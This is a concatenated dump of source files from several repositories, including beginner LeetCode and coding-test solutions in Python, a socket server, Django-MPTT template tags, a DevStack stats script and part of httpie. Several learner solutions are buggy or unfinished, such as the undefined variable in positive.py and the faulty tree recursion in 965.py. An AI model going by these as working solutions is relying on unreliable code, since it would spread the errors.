res = S.longestPalindrome('abaaaab')
print(res)
```
#### File: learn/leetcode/965.py
```python
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def __init__(self):
self.a = set()
def make_data(self, root):
if root:
self.a.add(root.val)
self.a.add(root.left.val)
self.a.add(root.right.val)
self.make_data(root.left)
self.make_data(root.left)
def make_data_2(self, root):
if root:
self.make_data(root.left)
self.make_data(root.left)
self.a.add(root.val)
def isUnivalTree(self, root):
"""
:type root: TreeNode
:rtype: bool
"""
self.make_data(root)
return len(self.a) < 2
aa = Solution()
b = aa.isUnivalTree([1,1,1,1,1,None,1])
print(b)
```
#### File: learn/leetcode/967.py
```python
class Solution:
def __init__(self):
self.s = dict()
def numsSameConsecDiff(self, N, K):
"""
:type N: int
:type K: int
:rtype: List[int]
"""
for x in range(K, 10):
mb = x-K
self.s[str(x)] = str(mb)
min_num = 10 ** (N-1)
nums = set()
if N % 2 == 0:
t = -1
else:
t = N
for a, b in self.s.items():
num_str = ""
num_str_2 = ""
while len(num_str) < N:
num_str += a
num_str += b
num_str_2 += b
num_str_2 += a
num_1 = int(num_str[:t])
num_2 = int(num_str_2[:t])
if num_1 >= min_num:
nums.add(num_1)
if num_2 >= min_num:
nums.add(num_2)
a = list(nums)
a.sort()
return a
aa = Solution()
b = aa.numsSameConsecDiff(N = 3, K = 2)
print(b)
```
#### File: learn/leetcode/973.py
```python
class Solution:
def count_l(self, a_list: list):
a, b = a_list
return a*a + b*b
def kClosest(self, points, K):
"""
:type points: List[List[int]]
:type K: int
:rtype: List[List[int]]
"""
m = list()
tmp = dict()
for point in points:
l = self.count_l(point)
if not tmp.get(l):
m.append(l)
tmp[l] = [point]
else:
tmp[l].append(point)
m.sort()
res = []
for x in m:
if len(res) == K:
break
for a in tmp[x]:
res.append(a)
if len(res) == K:
break
return res
if __name__ == '__main__':
s = Solution()
print(s.kClosest(points = [[1,3],[-2,2]], K = 1))
```
#### File: leetcode/tencent/14.py
```python
class Solution:
def longestCommonPrefix(self, strs):
"""
:type strs: List[str]
:rtype: str
"""
public_str = ""
```
#### File: learn/mi/102.py
```python
def solution(line):
# 缩进请使用 4 个空格,遵循 PEP8 规范
# please write your code here
# return 'your_answer'
while 'mi' in line:
line = line.replace('mi', '')
return line
aa = solution('fwfddqhmpcmmmiiiijfrmiimmmmmirwbte')
print(aa)
```
#### File: learn/mi/137.py
```python
import sys
def big_f(n):
if n == 1:
return a
elif n == 2:
return b
else:
return (c ** d) * big_f(n - 1) * big_f(n - 2)
for line in sys.stdin:
line = line.strip()
a, b, c, d, mod, n = [int(h) for h in line.split(' ')]
xi_l = [big_f(x) % mod for x in range(1, n + 1)]
xi = 1
for x in xi_l:
xi *= x
xi %= mod
print((9 - len(str(xi))) * '0' + str(xi))
```
#### File: learn/mi/24.py
```python
def solution(line):
# 缩进请使用 4 个空格,遵循 PEP8 规范
# please write your code here
# return 'your_answer'
nums = [int(x) for x in line.strip().split(',')]
nums.sort()
print(nums)
len_nums = len(nums)
if len_nums <= 1:
return 'false'
elif len_nums == 2 and nums[0] != nums[1]:
return 'false'
elif len_nums == 2 and nums[0] == nums[1]:
return 'true'
elif sum(nums) % 2 == 1:
return 'false'
else:
average = sum(nums) // 2
# num_j = []
# num_o = []
A = []
B = []
for num in nums:
if sum(B) >= sum(A):
A.append(num)
else:
B.append(num)
# if num % 2 == 1:
# num_j.append(num)
# else:
# num_o.append(num)
if num == average:
return 'true'
elif num > average:
return 'false'
print(A)
print(B)
if sum(A) == sum(B) and A:
return 'true'
m = min(len(A), len(B))
n = 0
while n < m:
for i in range(n, m):
A[i], B[i] = B[i], A[i]
if sum(A) == sum(B):
return 'true'
print()
n += 1
if __name__ == '__main__':
aa = solution("10,5,8,6,20,13,7,11")
print(aa)
"""
var g_channels = window.g_channels = {
201: {
id: 201,
name: '喜越国内'
},
203: {
id: 203,
name: '喜越国际'
},
293: {
id: 293,
name: 'Ctrip天驴国外'
},
294: {
id: 294,
name: 'Ctrip波妞海外'
},
296: {
id: 296,
name: 'Ctrip Ada'
},
1: {
id: 1,
name: '黑驴子'
},
2: {
id: 2,
name: '天旅'
},
3: {
name: '星途国际',
id: 3
},
4: {
id: 4,
name: '天宇'
},
5: {
id: 5,
name: '遨旅网'
},
6: {
id: 6,
name: '遨乐天下'
},
7: {
id: 7,
name: '遨房国际'
},
11: {
id: 11,
name: '飞猪'
},
19: {
id: 19,
name: '飞猪国际'
},
"""
```
#### File: learn/mi/5.py
```python
def solution(line):
# 缩进请使用 4 个空格,遵循 PEP8 规范
# please write your code here
# return 'your_answer'
words = [int(x) for x in line.strip().split(',')]
words.sort() # ['10', '12', '13', '14', '5', '6', '7', '8', '9']
b = (len(words)-1)//2
return words[b]
a = solution('12,13,14,5,6,7,8,9,10')
print(a)
```
#### File: learn/mi/61.py
```python
def solution(line):
# 缩进请使用 4 个空格,遵循 PEP8 规范
# please write your code here
# return 'your_answer'
nums_2 = [x.split(',') for x in line.strip().split(';')]
for i in range(len(nums_2)):
if nums_2[i] in nums_2[i+1:]:
return str(i+1)+','+str(nums_2[i+1:].index(nums_2[i])+(i+1)+1)
aa = solution("1,0,0,1,0;0,1,1,0,0;0,0,1,1,0;1,0,0,1,0;0,1,0,0,0")
print(aa)
```
#### File: learn/mi/79.py
```python
def solution(line):
# 缩进请使用 4 个空格,遵循 PEP8 规范
# please write your code here
# return 'your_answer'
N, k, m = line.split(',')
N, k, m = int(N), int(k), int(m)
s = k % 16
```
#### File: learn/mi/7.py
```python
def solution(line):
# 缩进请使用 4 个空格,遵循 PEP8 规范
# please write your code here
# return 'your_answer'
nums = [int(x) for x in line.strip().split(',') if int(x) > 0]
print(nums)
nums.sort()
count = 0
while nums:
num = nums.pop()
count += 1
if nums and (num-1 in nums):
continue
elif num-1:
return num-1
else:
return num+count
return 1
aa = solution("2,3")
print(aa)
```
#### File: learn/mi/97.py
```python
"""
@param string line 为单行测试数据
@return string 处理后的结果
"""
def solution(line):
# 缩进请使用 4 个空格,遵循 PEP8 规范
# please write your code here
# return 'your_answer'
x, y = line.strip().split(';')
A, B = x.split(' ')
A, B = int(A), int(B)
nums = [int(x) for x in y.split(' ')]
nums.sort()
if A == 0:
return 0.0
if B == 0:
return float(A)
# 理想部署距离
k_m = 2*A/B
# j_s_list = []
count = 0
j_s = [nums[0]]
for i in range(1, len(nums)):
if nums[i]-nums[i-1] <= k_m:
j_s.append(nums[i])
else:
# j_s_list.append(j_s)
count += A+(j_s[-1]-j_s[0])/2*B
j_s = [nums[i]]
# j_s_list.append(j_s)
count += A+(j_s[-1]-j_s[0])/2*B
return float(count)
if __name__ == '__main__':
aa = solution("20 5;100 0 7 90")
```
#### File: learn/mi/98.py
```python
"""
@param string line 为单行测试数据
@return string 处理后的结果
"""
def solution(line):
# 缩进请使用 4 个空格,遵循 PEP8 规范
# please write your code here
# return 'your_answer'
nums = [int(x) for x in line.strip().split(' ')]
nums.sort()
s = set()
for x in range(len(nums)):
s.add(nums[-(x+1)]*(x+1))
return max(s)
aa = solution("5 0 29 14")
print(aa)
```
#### File: learn/mi/9.py
```python
def solution(line):
# 缩进请使用 4 个空格,遵循 PEP8 规范
# please write your code here
# return 'your_answer'
a, bb = line.strip().split(' ')
b = int(bb)
if '0' in a and b >= a.index('0'):
return str(int(a[b:]))
else:
n = 0
l = len(a)
s = set()
while n <= l-b:
# s.add(int(a[n: n+l-b]))
s.add(int(a[0: n] + a[n+b:]))
n += 1
print(s)
return str(min(s))
aa = solution('1266 3')
print(aa)
```
#### File: python/class_case/case_1.py
```python
from python.class_case.base import Base
class Case1(Base):
def __init__(self):
Base.__init__(self)
self.a = 'a'
A = Case1()
print(A.a)
```
#### File: network_programming/socket_case/socket_server.py
```python
import socket
import threading
# 实例化服务端
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 绑定
server.bind(('0.0.0.0', 6959))
# 监听
server.listen(5)
def handle_sock(sock):
while True:
# 接收来自客户端的数据
recv_data = sock.recv(1024) # bufsize 指定数据流大小为1024字节
print(recv_data.decode("utf8"))
# 回复信息给客户端
res_data = input()
sock.send(res_data.encode("utf8"))
while True:
# 接收客户端连接请求,并建立连接
sock, __ = server.accept()
# 用线程去处理新接收的连接(用户)
client_thread = threading.Thread(target=handle_sock, args=(sock,))
client_thread.start()
```
#### File: python/sanic/test_get_post.py
```python
import asyncio
import redis
from sanic import Sanic
from sanic.response import json
app = Sanic()
connect = redis.Redis(
host='127.0.0.1',
password='',
port=6379,
decode_responses=True,
db=1
)
async def sleep_100():
from time import sleep
connect.set('hello', '1')
sleep(5)
print(10086)
@app.route('/test', methods=["GET", "POST"])
async def test(req):
name_list = req.json.get("name")
if connect.get('hello') != '1':
asyncio.ensure_future(sleep_100())
return json({
"name": name_list,
})
if __name__ == '__main__':
app.run(host='0.0.0.0', port=6664) # , workers=4
```
#### File: python/test/test_vague.py
```python
import unicodedata
import re
# 供应商携程 拼接属性 标识KEY 大部分有属性面积且格式如下
SplCtripIdentifier = 'area:'
SplCtripIdentifierCN = '面积:'
# 供应商携程过滤属性,属性一般拼接在后面并且有"("保护
SplCtripSplit = '('
# 英文字符集,26个英文字母,10个数字,空格字符
UsCharSet = {'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k',
'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6',
'7', '8', '9', ' '}
# 去掉全部的变音符号
def shave_makes(txt) -> str:
txt = txt or ''
norm_txt = unicodedata.normalize('NFD', txt)
shaved = ''.join(c for c in norm_txt if not unicodedata.combining(c))
return unicodedata.normalize('NFC', shaved)
# 处理西文字符
# BEGIN ASCIIZE
single_map = str.maketrans("""‚ƒ„†ˆ‹‘’“”•–—˜›""", # <1>
"""'f"*^<''""---~>""")
multi_map = str.maketrans({ # <2>
'€': '<euro>',
'…': '...',
'Œ': 'OE',
'™': '(TM)',
'œ': 'oe',
'‰': '<per mille>',
'‡': '**',
})
# 一些常见西文字符转换
def dewinize(txt: str) -> str:
txt = txt or ''
"""Replace Win1252 symbols with ASCII chars or sequences"""
return txt.translate(multi_map) # <4>
# 去掉指定字符之间的字符串
def remove_strings_between_specified_characters(txt: str, character_pairs: tuple = ('(', ')')):
"""
Agoda 城市字符串规范处理
"""
if character_pairs is None or not character_pairs:
return txt
a, b = character_pairs
index_a = txt.find(a)
index_b = txt.find(b)
if index_a < 0: # 主要考虑到没查询到字符起点下标
return txt
elif index_b < 0: # 未查询到字符终止下标
return txt[:index_a]
else:
return txt[:index_a] + txt[index_b + 1:]
# 过滤字符, 增加对变音字符的处理[参考流畅的Python 4.6.3] todo 用于数据预处理 文本过滤
def str_filter_plus(a_string, character_pairs=None):
# 过滤供应商携程拼接的属性
if SplCtripIdentifier in a_string.lower():
a_string = SplCtripSplit.join(a_string.split(SplCtripSplit)[:-1])
if SplCtripIdentifierCN in a_string:
a_string = SplCtripSplit.join(a_string.split(SplCtripSplit)[:-1])
# 去掉指定字符之间的字符串
a_string = remove_strings_between_specified_characters(a_string, character_pairs)
# 要保留需要的字符
def before_str_filter(before_string: str) -> str:
maybe_dict = {
'|': ' or ',
' ': 'oyjx',
'&': ' and ',
'/': ' or ',
"\\": ' or ',
'(': 'oyjx',
')': 'oyjx',
"(": 'oyjx',
")": 'oyjx',
"-": 'oyjx',
"_": 'oyjx',
',': ' ',
',': ' ',
}
maybe_map = str.maketrans(maybe_dict)
# key_list = ['&', '/', '\\', ' ', '-', '(', ')', "(", ")", "_"]
# for key in key_list:
# if key in before_string:
# before_string = before_string.replace(key, maybe_dict[key])
# print(before_string)
# 使用 str 内置的 translate
return before_string.translate(maybe_map)
# 替换回空格字符 ' ', 并将多个空格字符压缩为一个空格字符
def after_str_filter(after_string: str) -> str:
after_string = after_string.replace('oyjx', ' ')
return re.sub(' +', ' ', after_string)
# step_1, 去掉变音字符
a_string = dewinize(shave_makes(a_string))
# step_2, 进行字符保留
before_string = before_str_filter(a_string.lower())
# print(string)
# step_3, 过滤
return after_str_filter(re.sub('[^\w\u4e00-\u9fff]+', '', before_string)).strip()
def strings_type_cn(strings: str) -> bool:
# en_count, cn_count = 0, 0
cn_count = 0
strings = str_filter_plus(strings.lower())
for char in strings:
if char not in UsCharSet:
cn_count += 1
# return cn_count > 2 * en_count
return cn_count > 2 or (len(strings) - cn_count <= 2)
if __name__ == '__main__':
print(strings_type_cn("豪华大床房"))
```
#### File: learn/test/dict_2_nametuple.py
```python
from collections import namedtuple
# 字典对象装具名元祖
def dict_to_namedtuple(*, obj: dict):
NamedTuple = namedtuple('NamedTuple', obj.keys())
return NamedTuple(**obj)
dct = {
"RoomTypeID": 763417,
"StandardBedType": "1 Double or 2 Twin beds (大床或双床)",
"BedTypeID": 9,
"RoomTypeName": "Adjoining Semi Double Room, Smoking",
"RoomTypeNameCN": "客房, 吸烟房 (Adjoining Semi Double Room )",
"BedTypeDescCN": "<p>2 张单人床",
"BedTypeDesc": "<p>2 Twin Beds",
"SRoomID": 139461,
"SupplierID": 6,
"SourceRoomID": "",
"UserName": None,
"UserRemark": None,
"Status": 14
}
print(dict_to_namedtuple(obj=dct))
```
#### File: 1005281342/learn/test__.py
```python
import asyncio
async def hello_world():
print("Hello World! 23456789")
loop = asyncio.get_event_loop()
# Blocking call which returns when the hello_world() coroutine is done
loop.run_until_complete(hello_world())
loop.close()
``` |
{
"source": "100615056/Private-Class",
"score": 4
} |
#### File: Private-Class/Pyramid/positive.py
```python
def main():
num = postive_number()
print(num)
def postive_number():
while True:
# Get Number
n = int(input("Enter positive number: "))
# If positive number, exit
# Else ask again
if number > 0:
break
return number
main()
```
#### File: Private-Class/Pyramid/right-aligned.py
```python
def valid_pyramid():
while True:
# Get Number
number = int(input("Enter Number: "))
# Check that number is within range
if number >= 1 and number <= 8:
break
return number
# Print right-aligned pyramid
def print_pyramid(number, spaces):
for i in range(number):
for j in range(spaces):
print(' ', end='')
for k in range(i + 1):
print('#', end='')
print()
spaces -= 1
# Calculate spaces needed
def calculate_spaces(height):
space = height
return space
def main():
height = valid_pyramid()
spaces = calculate_spaces(height)
print_pyramid(height, spaces)
main()
``` |
{
"source": "1007047/Django-MPTT-With-Checkbox-and-Radio-button",
"score": 2
} |
#### File: mptt/templatetags/mptt_tags.py
```python
from django import template
from django.apps import apps
from django.core.exceptions import FieldDoesNotExist
from django.utils.encoding import force_str
from django.utils.safestring import mark_safe
from django.utils.translation import gettext as _
from mptt.utils import drilldown_tree_for_node, get_cached_trees, tree_item_iterator
register = template.Library()
# ## ITERATIVE TAGS
class FullTreeForModelNode(template.Node):
def __init__(self, model, context_var):
self.model = model
self.context_var = context_var
def render(self, context):
cls = apps.get_model(*self.model.split("."))
if cls is None:
raise template.TemplateSyntaxError(
_("full_tree_for_model tag was given an invalid model: %s") % self.model
)
context[self.context_var] = cls._tree_manager.all()
return ""
class DrilldownTreeForNodeNode(template.Node):
def __init__(
self,
node,
context_var,
foreign_key=None,
count_attr=None,
cumulative=False,
all_descendants=False,
):
self.node = template.Variable(node)
self.context_var = context_var
self.foreign_key = foreign_key
self.count_attr = count_attr
self.cumulative = cumulative
self.all_descendants = all_descendants
def render(self, context):
# Let any VariableDoesNotExist raised bubble up
args = [self.node.resolve(context)]
if self.foreign_key is not None:
app_label, model_name, fk_attr = self.foreign_key.split(".")
cls = apps.get_model(app_label, model_name)
if cls is None:
raise template.TemplateSyntaxError(
_("drilldown_tree_for_node tag was given an invalid model: %s")
% ".".join([app_label, model_name])
)
try:
cls._meta.get_field(fk_attr)
except FieldDoesNotExist:
raise template.TemplateSyntaxError(
_(
"drilldown_tree_for_node tag was given an invalid model field: %s"
)
% fk_attr
)
args.extend([cls, fk_attr, self.count_attr, self.cumulative])
context[self.context_var] = drilldown_tree_for_node(
*args, all_descendants=self.all_descendants
)
return ""
@register.tag
def full_tree_for_model(parser, token):
"""
Populates a template variable with a ``QuerySet`` containing the
full tree for a given model.
Usage::
{% full_tree_for_model [model] as [varname] %}
The model is specified in ``[appname].[modelname]`` format.
Example::
{% full_tree_for_model tests.Genre as genres %}
"""
bits = token.contents.split()
if len(bits) != 4:
raise template.TemplateSyntaxError(
_("%s tag requires three arguments") % bits[0]
)
if bits[2] != "as":
raise template.TemplateSyntaxError(
_("second argument to %s tag must be 'as'") % bits[0]
)
return FullTreeForModelNode(bits[1], bits[3])
@register.tag("drilldown_tree_for_node")
def do_drilldown_tree_for_node(parser, token):
"""
Populates a template variable with the drilldown tree for a given
node, optionally counting the number of items associated with its
children.
A drilldown tree consists of a node's ancestors, itself and its
immediate children or all descendants. For example, a drilldown tree
for a book category "Personal Finance" might look something like::
Books
Business, Finance & Law
Personal Finance
Budgeting (220)
Financial Planning (670)
Usage::
{% drilldown_tree_for_node [node] as [varname] %}
Extended usage::
{% drilldown_tree_for_node [node] as [varname] all_descendants %}
{% drilldown_tree_for_node [node] as [varname] count [foreign_key] in [count_attr] %}
{% drilldown_tree_for_node [node] as [varname] cumulative count [foreign_key] in [count_attr] %}
The foreign key is specified in ``[appname].[modelname].[fieldname]``
format, where ``fieldname`` is the name of a field in the specified
model which relates it to the given node's model.
When this form is used, a ``count_attr`` attribute on each child of
the given node in the drilldown tree will contain a count of the
number of items associated with it through the given foreign key.
If cumulative is also specified, this count will be for items
related to the child node and all of its descendants.
Examples::
{% drilldown_tree_for_node genre as drilldown %}
{% drilldown_tree_for_node genre as drilldown count tests.Game.genre in game_count %}
{% drilldown_tree_for_node genre as drilldown cumulative count tests.Game.genre in game_count %}
""" # noqa
bits = token.contents.split()
len_bits = len(bits)
if len_bits not in (4, 5, 8, 9, 10):
raise template.TemplateSyntaxError(
_("%s tag requires either three, four, seven, eight, or nine arguments")
% bits[0]
)
if bits[2] != "as":
raise template.TemplateSyntaxError(
_("second argument to %s tag must be 'as'") % bits[0]
)
all_descendants = False
if len_bits > 4:
if bits[4] == "all_descendants":
len_bits -= 1
bits.pop(4)
all_descendants = True
if len_bits == 8:
if bits[4] != "count":
raise template.TemplateSyntaxError(
_(
"if seven arguments are given, fourth argument to %s tag must be 'with'"
)
% bits[0]
)
if bits[6] != "in":
raise template.TemplateSyntaxError(
_("if seven arguments are given, sixth argument to %s tag must be 'in'")
% bits[0]
)
return DrilldownTreeForNodeNode(
bits[1], bits[3], bits[5], bits[7], all_descendants=all_descendants
)
elif len_bits == 9:
if bits[4] != "cumulative":
raise template.TemplateSyntaxError(
_(
"if eight arguments are given, fourth argument to %s tag must be 'cumulative'"
)
% bits[0]
)
if bits[5] != "count":
raise template.TemplateSyntaxError(
_(
"if eight arguments are given, fifth argument to %s tag must be 'count'"
)
% bits[0]
)
if bits[7] != "in":
raise template.TemplateSyntaxError(
_(
"if eight arguments are given, seventh argument to %s tag must be 'in'"
)
% bits[0]
)
return DrilldownTreeForNodeNode(
bits[1],
bits[3],
bits[6],
bits[8],
cumulative=True,
all_descendants=all_descendants,
)
else:
return DrilldownTreeForNodeNode(
bits[1], bits[3], all_descendants=all_descendants
)
@register.filter
def tree_info(items, features=None):
"""
Given a list of tree items, produces doubles of a tree item and a
``dict`` containing information about the tree structure around the
item, with the following contents:
new_level
``True`` if the current item is the start of a new level in
the tree, ``False`` otherwise.
closed_levels
A list of levels which end after the current item. This will
be an empty list if the next item is at the same level as the
current item.
Using this filter with unpacking in a ``{% for %}`` tag, you should
have enough information about the tree structure to create a
hierarchical representation of the tree.
Example::
{% for genre,structure in genres|tree_info %}
{% if structure.new_level %}<ul><li>{% else %}</li><li>{% endif %}
{{ genre.name }}
{% for level in structure.closed_levels %}</li></ul>{% endfor %}
{% endfor %}
"""
kwargs = {}
if features:
feature_names = features.split(",")
if "ancestors" in feature_names:
kwargs["ancestors"] = True
return tree_item_iterator(items, **kwargs)
@register.filter
def tree_path(items, separator=" :: "):
"""
Creates a tree path represented by a list of ``items`` by joining
the items with a ``separator``.
Each path item will be coerced to unicode, so a list of model
instances may be given if required.
Example::
{{ some_list|tree_path }}
{{ some_node.get_ancestors|tree_path:" > " }}
"""
return separator.join(force_str(i) for i in items)
# ## RECURSIVE TAGS
@register.filter
def cache_tree_children(queryset):
"""
Alias to `mptt.utils.get_cached_trees`.
"""
return get_cached_trees(queryset)
class RecurseTreeNode(template.Node):
def __init__(self, template_nodes, queryset_var):
self.template_nodes = template_nodes
self.queryset_var = queryset_var
def _render_node(self, context, node):
bits = []
context.push()
for child in node.get_children():
bits.append(self._render_node(context, child))
context["node"] = node
context["children"] = mark_safe("".join(bits))
rendered = self.template_nodes.render(context)
context.pop()
return rendered
def render(self, context):
queryset = self.queryset_var.resolve(context)
roots = cache_tree_children(queryset)
bits = [self._render_node(context, node) for node in roots]
return "".join(bits)
@register.tag
def recursetree(parser, token):
"""
Iterates over the nodes in the tree, and renders the contained block for each node.
This tag will recursively render children into the template variable {{ children }}.
Only one database query is required (children are cached for the whole tree)
Usage:
<ul>
{% recursetree nodes %}
<li>
{{ node.name }}
{% if not node.is_leaf_node %}
<ul>
{{ children }}
</ul>
{% endif %}
</li>
{% endrecursetree %}
</ul>
"""
bits = token.contents.split()
if len(bits) != 2:
raise template.TemplateSyntaxError(_("%s tag requires a queryset") % bits[0])
queryset_var = template.Variable(bits[1])
template_nodes = parser.parse(("endrecursetree",))
parser.delete_first_token()
return RecurseTreeNode(template_nodes, queryset_var)
``` |
{
"source": "1007530194/Dairy2",
"score": 3
} |
#### File: diary/src/MoveFileFromQuiver.py
```python
import os
import shutil
import time
root = "/Users/weidian/Documents/Diary/"
temp_path = root + "_posts/temp/"
post_path = root + "_posts/"
image_path = root + "assets/images/"
def move_md_file(from_path, to_path, dir_path):
fr = open(from_path, 'r')
fw = open(to_path, 'w')
for data in fr.readlines():
if "](resources/" in data:
data = data.replace("resources", "{{ site.baseurl }}{{ site.images }}/" + dir_path)
fw.write(data)
fr.close()
fw.close()
os.remove(from_path)
# 移动图片
def move_image(from_path, to_path):
if not os.path.exists(to_path):
os.mkdir(to_path)
print "移动图片文件夹" + from_path + "\t" + to_path
for dir_path in os.listdir(from_path):
shutil.move(from_path + "/" + dir_path, to_path + "/" + dir_path)
shutil.rmtree(from_path)
def solver(dir_path):
print "*****************************************"
print "移动文件夹" + dir_path
tag_path = post_path + dir_path
if not os.path.exists(tag_path):
os.mkdir(tag_path)
for file_path in os.listdir(temp_path + dir_path):
if file_path == "resources":
from_path = temp_path + dir_path + "/" + file_path
to_path = image_path + dir_path
move_image(from_path, to_path)
elif ".md" in file_path:
print time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
from_path = temp_path + dir_path + "/" + file_path
to_path = tag_path + "/" + time.strftime("%Y-%m-%d-", time.localtime()) + file_path
move_md_file(from_path, to_path, dir_path)
shutil.rmtree(temp_path + dir_path)
if __name__ == '__main__':
print "start"
for dir_path in os.listdir(temp_path):
if os.path.isdir(temp_path + dir_path):
print (dir_path + " is dir")
solver(dir_path)
print "end"
``` |
{
"source": "1007530194/Dairy",
"score": 3
} |
#### File: book/splider/MachineLearninginAction.py
```python
import re
import urllib
import requests
from bs4 import BeautifulSoup
github_root = "https://github.com"
github_raw = "https://raw.githubusercontent.com"
s1 = "https://raw.githubusercontent.com/apachecn/MachineLearning/python-2.7/LICENSE"
s2 = "https://raw.githubusercontent.com/apachecn/MachineLearning/blob/python-2.7/LICENSE"
def downLoadFile(url, title):
url = url.replace("/blob", "")
print("download file FROM \t" + url + "\t to \t" + title)
if re.search("(jpg|png|jpeg)", title):
urllib.urlretrieve(github_raw + url, title)
#
# r = requests.get(github_raw + url)
# with open(title, 'wb') as f:
# f.write(r.content)
else:
url = github_raw + url
print (url)
req = requests.get(url)
soup = BeautifulSoup(req.content.decode("gbk", "ignore"), 'lxml')
with open(title, 'wb') as f:
f.write(soup.find("p").text.decode("utf8", "ignore"))
def getPath(url):
req = requests.get(url)
soup = BeautifulSoup(req.content.decode('gbk', 'ignore'), 'lxml')
# soup = BeautifulSoup(req.content, 'lxml')
tables = soup.find("table", "files js-navigation-container js-active-navigation-container")
for file_wrap in tables.find_all("tr", "js-navigation-item"):
context = file_wrap.find("a", "js-navigation-open")
path = context.attrs["href"]
title = context.text
print (path + "\t" + title)
if 'octicon-file-directory' in file_wrap.find("td", "icon").find("svg").attrs["class"]:
print "directory"
elif 'octicon-file' in file_wrap.find("svg").attrs["class"]:
print "file"
downLoadFile(path, title)
if __name__ == '__main__':
url = "https://github.com/apachecn/MachineLearning"
getPath(url=url)
``` |
{
"source": "1007827412/Precise-Medicine-Online-Cloud-Platform",
"score": 2
} |
#### File: 1007827412/Precise-Medicine-Online-Cloud-Platform/rcnn_bc_recognition.py
```python
import cv2
def recognize(img, imgdir):
cv2.imwrite(imgdir,img)
``` |
{
"source": "10088/devstack",
"score": 2
} |
#### File: devstack/tools/get-stats.py
```python
import argparse
import csv
import datetime
import glob
import itertools
import json
import logging
import os
import re
import socket
import subprocess
import sys
try:
import psutil
except ImportError:
psutil = None
print('No psutil, process information will not be included',
file=sys.stderr)
try:
import pymysql
except ImportError:
pymysql = None
print('No pymysql, database information will not be included',
file=sys.stderr)
LOG = logging.getLogger('perf')
# https://www.elastic.co/blog/found-crash-elasticsearch#mapping-explosion
def tryint(value):
try:
return int(value)
except (ValueError, TypeError):
return value
def get_service_stats(service):
stats = {'MemoryCurrent': 0}
output = subprocess.check_output(['/usr/bin/systemctl', 'show', service] +
['-p%s' % stat for stat in stats])
for line in output.decode().split('\n'):
if not line:
continue
stat, val = line.split('=')
stats[stat] = tryint(val)
return stats
def get_services_stats():
services = [os.path.basename(s) for s in
glob.glob('/etc/systemd/system/devstack@*.service')] + \
['apache2.service']
return [dict(service=service, **get_service_stats(service))
for service in services]
def get_process_stats(proc):
cmdline = proc.cmdline()
if 'python' in cmdline[0]:
cmdline = cmdline[1:]
return {'cmd': cmdline[0],
'pid': proc.pid,
'args': ' '.join(cmdline[1:]),
'rss': proc.memory_info().rss}
def get_processes_stats(matches):
me = os.getpid()
procs = psutil.process_iter()
def proc_matches(proc):
return me != proc.pid and any(
re.search(match, ' '.join(proc.cmdline()))
for match in matches)
return [
get_process_stats(proc)
for proc in procs
if proc_matches(proc)]
def get_db_stats(host, user, passwd):
dbs = []
try:
db = pymysql.connect(host=host, user=user, password=<PASSWORD>,
database='stats',
cursorclass=pymysql.cursors.DictCursor)
except pymysql.err.OperationalError as e:
if 'Unknown database' in str(e):
print('No stats database; assuming devstack failed',
file=sys.stderr)
return []
raise
with db:
with db.cursor() as cur:
cur.execute('SELECT db,op,count FROM queries')
for row in cur:
dbs.append({k: tryint(v) for k, v in row.items()})
return dbs
def get_http_stats_for_log(logfile):
stats = {}
apache_fields = ('host', 'a', 'b', 'date', 'tz', 'request', 'status',
'length', 'c', 'agent')
ignore_agents = ('curl', 'uwsgi', 'nova-status')
for line in csv.reader(open(logfile), delimiter=' '):
fields = dict(zip(apache_fields, line))
if len(fields) != len(apache_fields):
# Not a combined access log, so we can bail completely
return []
try:
method, url, http = fields['request'].split(' ')
except ValueError:
method = url = http = ''
if 'HTTP' not in http:
# Not a combined access log, so we can bail completely
return []
# Tempest's User-Agent is unchanged, but client libraries and
# inter-service API calls use proper strings. So assume
# 'python-urllib' is tempest so we can tell it apart.
if 'python-urllib' in fields['agent'].lower():
agent = 'tempest'
else:
agent = fields['agent'].split(' ')[0]
if agent.startswith('python-'):
agent = agent.replace('python-', '')
if '/' in agent:
agent = agent.split('/')[0]
if agent in ignore_agents:
continue
try:
service, rest = url.strip('/').split('/', 1)
except ValueError:
# Root calls like "GET /identity"
service = url.strip('/')
rest = ''
method_key = '%s-%s' % (agent, method)
try:
length = int(fields['length'])
except ValueError:
LOG.warning('[%s] Failed to parse length %r from line %r' % (
logfile, fields['length'], line))
length = 0
stats.setdefault(service, {'largest': 0})
stats[service].setdefault(method_key, 0)
stats[service][method_key] += 1
stats[service]['largest'] = max(stats[service]['largest'],
length)
# Flatten this for ES
return [{'service': service, 'log': os.path.basename(logfile),
**vals}
for service, vals in stats.items()]
def get_http_stats(logfiles):
return list(itertools.chain.from_iterable(get_http_stats_for_log(log)
for log in logfiles))
def get_report_info():
return {
'timestamp': datetime.datetime.now().isoformat(),
'hostname': socket.gethostname(),
'version': 2,
}
if __name__ == '__main__':
process_defaults = ['privsep', 'mysqld', 'erlang', 'etcd']
parser = argparse.ArgumentParser()
parser.add_argument('--db-user', default='root',
help=('MySQL user for collecting stats '
'(default: "root")'))
parser.add_argument('--db-pass', default=None,
help='MySQL password for db-user')
parser.add_argument('--db-host', default='localhost',
help='MySQL hostname')
parser.add_argument('--apache-log', action='append', default=[],
help='Collect API call stats from this apache log')
parser.add_argument('--process', action='append',
default=process_defaults,
help=('Include process stats for this cmdline regex '
'(default is %s)' % ','.join(process_defaults)))
args = parser.parse_args()
logging.basicConfig(level=logging.WARNING)
data = {
'services': get_services_stats(),
'db': pymysql and args.db_pass and get_db_stats(args.db_host,
args.db_user,
args.db_pass) or [],
'processes': psutil and get_processes_stats(args.process) or [],
'api': get_http_stats(args.apache_log),
'report': get_report_info(),
}
print(json.dumps(data, indent=2))
``` |
{
"source": "10088/httpie",
"score": 2
} |
#### File: httpie/cli/nested_json.py
```python
from enum import Enum, auto
from typing import (
Any,
Iterator,
NamedTuple,
Optional,
List,
NoReturn,
Type,
Union,
)
from httpie.cli.dicts import NestedJSONArray
from httpie.cli.constants import EMPTY_STRING, OPEN_BRACKET, CLOSE_BRACKET, BACKSLASH, HIGHLIGHTER
class HTTPieSyntaxError(ValueError):
def __init__(
self,
source: str,
token: Optional['Token'],
message: str,
message_kind: str = 'Syntax',
) -> None:
self.source = source
self.token = token
self.message = message
self.message_kind = message_kind
def __str__(self):
